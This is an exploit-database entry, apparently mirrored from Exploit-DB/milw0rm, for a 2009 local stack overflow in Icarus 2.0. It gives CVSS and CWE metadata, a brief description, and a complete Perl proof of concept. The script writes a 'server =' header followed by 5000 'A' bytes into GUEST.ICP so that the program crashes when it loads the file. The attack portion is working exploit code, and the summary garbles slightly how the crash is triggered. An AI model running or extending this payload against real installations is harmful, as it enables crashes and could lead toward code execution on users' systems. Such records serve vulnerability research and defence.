header-logo
Suggest Exploit
vendor:
Icarus 2.0
by:
ThE g0bL!N
7,8
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: Icarus 2.0
Affected Version From: Icarus 2.0
Affected Version To: Icarus 2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Icarus 2.0(GUEST.ICP) Local Stack Overflow PoC

This exploit is a proof of concept for a local stack overflow vulnerability in Icarus 2.0(GUEST.ICP). The exploit is written in Perl and creates a file called GUEST.ICP with a header of 'server =' followed by 5000 'A' characters. When the user clicks on the Perl file, the program crashes.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#Icarus 2.0(GUEST.ICP) Local Stack Overflow PoC
#By ThE g0bL!N
#usage: After Clicking On Perl File  Run The Program And Choose Continue  Booom The Program Crashed :)
################################################################
$Header="\x73\x65\x72\x76\x65\x72\x20\x3D" ;
$junk="\x41" x 5000 ;
###################################################################
open(myfile,'>>GUEST.ICP');
print myfile $Header.$junk;
###################################################################

# milw0rm.com [2009-07-14]